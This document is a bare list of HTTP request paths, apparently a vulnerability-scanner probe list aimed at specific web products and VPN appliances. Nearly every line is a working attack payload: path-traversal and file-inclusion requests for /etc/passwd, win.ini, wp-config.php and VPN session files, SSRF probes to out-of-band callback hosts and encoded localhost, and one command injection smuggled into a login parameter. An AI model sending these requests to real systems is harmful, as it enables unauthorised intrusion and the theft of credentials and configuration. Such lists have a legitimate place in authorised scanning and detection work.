/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
/cgi-bin/logoff.cgi
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
/../../etc/passwd
/filemanager/upload.php
/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/blast/nph-viewgif.cgi?../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine
/wp-content/plugins/wp-payeezy-pay/donate.php
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username=
/vpn/../vpns/cfg/smb.conf
/wp-admin/admin-ajax.php?action=aam-media-load&aam-media=/wp-config.php
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/index.php?page=/etc/passwd%00
/wp1/home-18/?qtproxycall=https://oast.me
/?url=http://0177.0.0.1/server-status
/?host=http://0177.0.0.1/server-status
/?file=http://0177.0.0.1/etc/passwd
/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/login/cwp_theme/original/img/ico/favicon.ico
/login/design/img/ico/favicon.ico

/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd
/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd
/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php.
/SAAS/t/_/;/WEB-INF/web.xml
/i18n/component/JS?locale=en-US
/api/v1/version
/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd
/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==
/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd
/?lang=../../thinkphp/base
/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug
/fp-content/
/flatpress/fp-content/
/?q=./gibbon.sql
/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/
/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png
/wp-content/plugins/media-library-assistant/readme.txt
/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://{{interactsh-url}}/patrowl.svg
/?filename=../../../../../../etc/passwd&mphb_action=download
/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={
/wp-content/plugins/essential-blocks/readme.txt
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/js/..%2f%2f/wizard.htm
/images/..%2f%2f/wizard.htm
/login.rst
/tmp/temp.db%3f.1.1.1.1a-1.css
/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css
/assets/../package.json
/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/
/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}
